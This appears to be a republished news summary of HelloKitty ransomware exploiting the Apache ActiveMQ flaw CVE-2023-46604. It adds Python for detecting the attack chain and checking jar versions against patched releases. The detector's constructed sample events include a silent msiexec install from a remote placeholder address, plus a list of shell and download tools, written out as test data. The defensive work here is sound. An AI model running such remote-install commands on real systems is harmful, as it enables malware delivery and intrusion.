HelloKitty ransomware now exploiting Apache ActiveMQ flaw in attacks


November 2, 2023 at 12:23PM

HelloKitty ransomware is exploiting a critical Apache ActiveMQ flaw to breach networks and encrypt devices. The flaw allows attackers to execute arbitrary shell commands. Despite a security update being released, there are still thousands of internet-exposed servers using a vulnerable version. Rapid7 reported instances of threat actors exploiting the flaw to deploy HelloKitty ransomware. Administrators are urged to apply the available security updates to protect against this vulnerability.

Summary:

The HelloKitty ransomware operation is exploiting a vulnerability in Apache ActiveMQ tracked as CVE-2023-46604, a critical-severity remote code execution flaw that lets an unauthenticated attacker run arbitrary shell commands on the broker host. Apache released fixed versions on October 25, 2023, yet as of October 30 there were reportedly still 3,329 internet-exposed ActiveMQ servers running a vulnerable version.

Rapid7 has observed at least two instances in which threat actors exploited the vulnerability to deploy HelloKitty ransomware. The HelloKitty operation launched in November 2020, and its source code was recently leaked on cybercrime forums. The attacks began on October 27, two days after Apache published the security bulletin and fixes, so this is n-day exploitation of a publicly disclosed and patched flaw rather than a zero-day.

Rapid7 analyzed two MSI files disguised as PNG images. Each contained a .NET executable that loads a base64-encoded .NET DLL named EncDLL, which terminates a list of specific processes, encrypts files, and appends the “.locked” extension to them. Several artifacts point to these attacks: atypical behaviour from the java.exe process running the Apache ActiveMQ broker, and remote binaries being loaded via MSIExec (msiexec.exe invoked with a remote package location).
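As an added illustration (not code from Rapid7 or the article), the following Python scans constructed Sysmon-style process-creation records for the artifacts named above: the java.exe process that hosts the ActiveMQ broker spawning msiexec.exe with a remote URL, and, as a generalization, that broker process spawning any installer or shell at all, which a message broker has no legitimate reason to do. The record schema, the sample command lines, the file names and the 203.0.113.x addresses are all constructed for the example.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record in a Sysmon Event ID 1 style (constructed schema)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str
    parent_cmdline: str


# Anything that looks like a remote location on the child's command line.
URL_RE = re.compile(r'\b(?:https?|ftp)://[^\s"\']+', re.IGNORECASE)

# Children a broker JVM has no legitimate reason to spawn (assumption for this rule).
SUSPICIOUS_CHILDREN = {"msiexec.exe", "cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def is_activemq_java(image: str, cmdline: str) -> bool:
    """True when the process is a JVM whose command line identifies ActiveMQ."""
    return basename(image) == "java.exe" and "activemq" in cmdline.lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a reason string if the event matches the rule, else None."""
    if not is_activemq_java(ev.parent_image, ev.parent_cmdline):
        return None
    child = basename(ev.image)
    # The chain described in the article: broker JVM -> msiexec fetching a remote package.
    if child == "msiexec.exe" and URL_RE.search(ev.cmdline):
        return "high: ActiveMQ java.exe spawned msiexec.exe installing from a remote URL"
    # Broader rule: the broker JVM spawning any installer or shell is still atypical.
    if child in SUSPICIOUS_CHILDREN:
        return "medium: ActiveMQ java.exe spawned " + child
    return None


def flag_events(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    hits = []
    for ev in events:
        reason = classify(ev)
        if reason:
            hits.append((ev.pid, reason))
    return hits


# Constructed sample data (not real telemetry from any incident).
JAVA = r"C:\Program Files\Java\jre-17\bin\java.exe"
ACTIVEMQ_CMD = (r'"C:\Program Files\Java\jre-17\bin\java.exe" -Xms64M -Xmx1G '
                r'-Dactivemq.home="C:\apache-activemq-5.17.3" '
                r'-classpath "C:\apache-activemq-5.17.3\bin\activemq.jar" '
                r'org.apache.activemq.console.Main start')

SAMPLE_EVENTS = [
    # Exploit chain as described: broker JVM spawns msiexec to fetch an MSI disguised as a PNG.
    ProcEvent(4120, r"C:\Windows\System32\msiexec.exe",
              'msiexec.exe /q /i "http://203.0.113.5/image.png"', JAVA, ACTIVEMQ_CMD),
    # Broker JVM spawning a shell: not the documented chain, still not broker behaviour.
    ProcEvent(4130, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami", JAVA, ACTIVEMQ_CMD),
    # Benign: an administrator installing a local package from Explorer.
    ProcEvent(5000, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\installers\tool.msi"', r"C:\Windows\explorer.exe", "explorer.exe"),
    # A different Java application spawning msiexec; outside this rule's scope.
    ProcEvent(5010, r"C:\Windows\System32\msiexec.exe",
              'msiexec.exe /i "http://203.0.113.9/update.msi"', JAVA,
              r'"C:\Program Files\Java\jre-17\bin\java.exe" -jar C:\apps\billing.jar'),
]

if __name__ == "__main__":
    for pid, reason in flag_events(SAMPLE_EVENTS):
        print(pid, reason)
```

The rule keys on the parent command line containing "activemq" because the broker is normally started through org.apache.activemq.console.Main or a wrapper that passes activemq.home, so that string is present whichever launcher is used; the last sample event shows that a non-ActiveMQ JVM spawning msiexec is deliberately left to a separate, broader rule.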

Administrators should apply the available security updates as soon as possible, since thousands of vulnerable ActiveMQ instances remain exposed. The affected releases are 5.18.0 through 5.18.2, 5.17.0 through 5.17.5, 5.16.0 through 5.16.6, and everything before 5.15.16; the fixed versions are 5.15.16, 5.16.7, 5.17.6, and 5.18.3. For detailed indicators of compromise, see the FBI report on the HelloKitty ransomware family.
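An added example (not from the article or from Apache) that turns the version list above into an inventory check: it extracts the release number from an ActiveMQ jar filename and compares it against the first patched micro release of each affected 5.x branch. Treating 5.x releases older than 5.15 as affected follows the Apache advisory's wording ("before 5.15.16"); anything outside the 5.x line is reported as unknown rather than assumed safe. The jar filenames are constructed for the example.

```python
import re
from typing import Optional, Tuple

# First patched micro release per affected 5.x branch, as listed above.
FIXED_MICRO = {15: 16, 16: 7, 17: 6, 18: 3}

# Matches e.g. activemq-client-5.17.4.jar or activemq-broker-5.18.3-tests.jar.
JAR_RE = re.compile(r"activemq-[a-z-]+-(\d+\.\d+\.\d+)(?:-[\w.]+)?\.jar$", re.IGNORECASE)


def version_from_jar(filename: str) -> Optional[str]:
    """Pull the release number out of an ActiveMQ jar filename, or None if it is not one."""
    m = JAR_RE.search(filename)
    return m.group(1) if m else None


def parse_version(v: str) -> Tuple[int, int, int]:
    """Split '5.17.4' (optionally with a '-SNAPSHOT' style suffix) into integers."""
    core = v.strip().split("-")[0]
    nums = [int(p) for p in core.split(".")[:3]]
    while len(nums) < 3:
        nums.append(0)
    return nums[0], nums[1], nums[2]


def assess(v: str) -> str:
    """Return 'vulnerable', 'patched' or 'unknown' for a version string against CVE-2023-46604."""
    major, minor, micro = parse_version(v)
    if major != 5:
        return "unknown"          # not a 5.x release; not covered by the list above
    if minor < 15:
        return "vulnerable"       # advisory wording: "before 5.15.16" (assumption noted in the lead-in)
    if minor not in FIXED_MICRO:
        return "unknown"
    return "patched" if micro >= FIXED_MICRO[minor] else "vulnerable"


def assess_jar(filename: str) -> str:
    version = version_from_jar(filename)
    return assess(version) if version else "unknown"


if __name__ == "__main__":
    # Constructed filenames, as an inventory script might collect them from lib/ directories.
    for jar in ("activemq-client-5.17.4.jar", "activemq-all-5.18.3.jar", "activemq-core-5.14.5.jar"):
        print(jar, assess_jar(jar))
```

Checking jar names is a fallback for hosts where the web console is disabled or firewalled; where it is reachable, the same comparison applies to the version string the console reports.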
